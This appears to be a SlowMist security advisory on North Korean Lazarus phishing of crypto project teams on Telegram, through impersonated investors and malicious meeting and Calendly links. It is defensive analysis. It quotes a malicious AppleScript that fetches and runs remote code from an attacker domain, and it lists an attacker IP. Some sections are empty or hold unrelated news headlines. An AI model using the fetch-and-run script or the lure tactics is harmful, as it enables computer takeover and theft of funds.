Analysis of Targeted Fraud Attacks by North Korean Hackers on Telegram

Examining North Korean Hackers' Targeted Fraud Attacks on Telegram

Background

As early as 2022, the SlowMist security team discovered through the SlowMist BTI intelligence network that the North Korean hacker group Lazarus had launched a large-scale Telegram phishing operation targeting the cryptocurrency industry. Recently, North Korean hackers have even begun to impersonate well-known investment institutions and carry out fraudulent phishing against project parties. Given the wide range of impact, SlowMist conducted an analysis here.

Tactics

1. Choose well-known investment institutions as impersonation targets, and then create fake Telegram accounts:

• Holy Cogwheels! Cogwise (COGW) Token Presale Skyrockets to $1.5 Million in Fundraising!
• From Meme to Millions Dogecoin Rockets 10% on Its 10th Anniversary!
• South Korean-Filipino ‘USDT-Gambling Ring’ Shut Down: Getting Creative with Crypto Crime

2. Look for well-known DeFi project parties as targets. Pretending to want to invest in them, use fake accounts to implement scams:

The North Korean hackers will initiate a chat with the target to establish contact. If the project party sees the message and lacks security awareness, the following scene will occur:

After gaining the project party’s trust, the North Korean hackers will proceed to arrange a meeting. There are two attack methods here:

1. Invite the project party to join a meeting on a site like ***.group-meeting.team, pretending to ask if they have time for a meeting or further discussion, and actively provide a malicious meeting link. When the project party clicks the link, they will see regional access restrictions. At this point, the North Korean hackers will then prompt the project party to download and run the malicious script they provide for “modifying location.” Once the project party does so, their computer will be controlled by the North Korean hackers, leading to the theft of funds. The following is the content of the malicious script IP_Request.scpt:

set fix_url to “https://support.group-meeting.online/778188/request-for-troubleshooting”

set sc to do shell script “curl -L -k””& fix_url &”\””

run script sc

Code Explanation:

2. Utilize the “Add Custom Link” feature on the Calendly meeting scheduling system’s event page to insert a malicious link and launch a phishing attack. Since Calendly integrates well with the daily work background of most project parties, these malicious links are not easily suspected, and the project parties are prone to unintentionally clicking on the malicious link, downloading, and executing the malicious code. At this point, the North Korean hackers can also obtain project-related information or permissions.

The SlowMist security team also issued a reminder about these attack methods on November 30, 2023:

Basic IOC:

IP: 104.168.137.21

Domains:

Malicious attack example:

Summary

Given that such scams continue to occur, it is recommended that Web3 users ensure the authenticity of the other party when adding friends through dual-channel verification, enable two-factor authentication (2FA) on Telegram, and always pay attention to transaction security to avoid financial losses.

If you accidentally run related Trojans, transfer the relevant funds, disconnect from the network, and run antivirus software as soon as possible. Also, remember to change the relevant account passwords on the target computer (including those stored in the browser).

We will continue to update Blocking; if you have any questions or suggestions, please contact us!